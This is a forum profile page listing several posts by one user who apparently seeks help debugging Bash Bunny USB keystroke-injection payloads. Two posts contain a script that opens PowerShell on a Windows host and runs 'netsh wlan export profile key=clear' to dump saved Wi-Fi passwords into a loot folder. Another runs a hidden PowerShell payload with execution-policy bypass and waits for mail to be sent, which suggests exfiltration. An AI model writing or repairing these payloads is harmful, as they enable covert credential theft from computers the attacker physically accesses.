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Everything posted by Kristoxx

  1. I have tried to reset the password with the indicated steps, but to no avail #!/bin/bash LED SETUP ATTACKMODE SERIAL echo -e "hak5bunny\nhak5bunny" | passwd LED FINISH Debian GNU/Linux 8 bunny ttyGS0 bunny login: root Password: Login incorrect
  2. I have followed your instructions and corrected the code but still it only runs powershell and then it does not write anything, the light remains red DUCKY_LANG es-la GET SWITCH_POSITION ATTACKMODE HID STORAGE # Create directory under loot to store passwords in mkdir -p /root/udisk/loot/WiPassDump LED R 200 QUACK DELAY 6000 # Open windows run console QUACK GUI r QUACK DELAY 1000 # enter payload and execute QUACK STRING powershell QUACK ENTER QUACK DELAY 1000 QUACK STRING $volume \= \(Get-WmiObject -Class Win32_Volume | Where-Object { $_.Label -eq "BashBunny" }).Name QUACK STRING Set-Location -Path "$volume\loot\WiPassDump" QUACK STRING netsh wlan export profile key=clear QUACK ENTER #Let code run, then sync QUACK DELAY 5000 sync # Wait for misc. to happen on computer QUACK DELAY 1000 # Done! LED G I think the problem is on the line QUACK STRING $volume \= \(Get-WmiObject -Class Win32_Volume | Where-Object { $_.Label -eq "BashBunny" }).Name QUACK STRING Set-Location -Path "$volume\loot\WiPassDump" QUACK STRING netsh wlan export profile key=clear QUACK ENTER I also wanted to thank you for the help, greetings
  3. DUCKY_LANG es-la GET SWITCH_POSITION ATTACKMODE HID STORAGE # Create directory under loot to store passwords in mkdir -p /root/udisk/loot/WiPassDump LED R 200 DELAY 6000 # Open windows run console Q GUI r Q DELAY 1000 # enter payload and execute Q STRING notepad ENTER DELAY 1000 Q STRING hola DELAY 1000 Q STRING $volume \= \(Get-WmiObject -Class Win32_Volume | Where-Object { $_.Label -eq "BashBunny" }).Name Q STRING Set-Location -Path "$volume\loot\WiPassDump" Q STRING netsh wlan export profile key=clear ENTER #Let code run, then sync DELAY 5000 sync # Wait for misc. to happen on computer DELAY 1000 # Done! LED G
  4. I have following script ######## INITIALIZATION ######## LED SETUP GET SWITCH_POSITION ATTACKMODE HID STORAGE ######## ATTACK ######## LED ATTACK DELAY 6000 RUN WIN powershell ENTER DELAY 3000 STRING $volume = (Get-WmiObject -Class Win32_Volume | Where-Object { $_.Label -eq "BashBunny" }).Name; Set-Location -Path "$volume\payloads\switch2" .\payload.ps1 # RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\payload.ps1')" # Wait until mail are sended. sleep 10 When executing it gets stuck in PowerShell but does not write $volume = .... what could it be? I have tried making its execution slower with delay, but the same result.
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